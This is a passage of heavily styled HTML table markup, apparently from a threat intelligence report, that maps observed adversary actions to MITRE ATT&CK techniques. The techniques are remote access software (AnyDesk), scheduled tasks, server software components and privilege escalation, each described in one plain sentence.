-webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1414034663" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{40}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1219: Remote Access Software</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1543395209" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{47}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary installed and used<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">AnyDesk</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>for unauthorized remote access.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="700993208" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{54}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="16" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="909630329" paraeid="{09772ea6-c54d-4dc0-bb20-bb5c3a18251a}{240}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="769156948" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{62}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1053.005: Scheduled Task/Job: Scheduled Task</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="786410295" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{69}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary configured tasks to run on a schedule or at system startup.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1839261681" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{76}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="17" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="509034837" paraeid="{09772ea6-c54d-4dc0-bb20-bb5c3a18251a}{244}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="446023233" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{84}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1505: Server Software Component</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1852118974" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{91}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary installed malware on breached devices to<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">facilitate</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">remote command execution via HTTP.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1207110950" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{98}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="18" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="2015025073" paraeid="{023b68d7-034e-4791-838b-4044af5360cb}{240}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Privilege escalation</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1689188616" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{128}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: normal; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1068: Exploitation for Privilege Escalation</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" 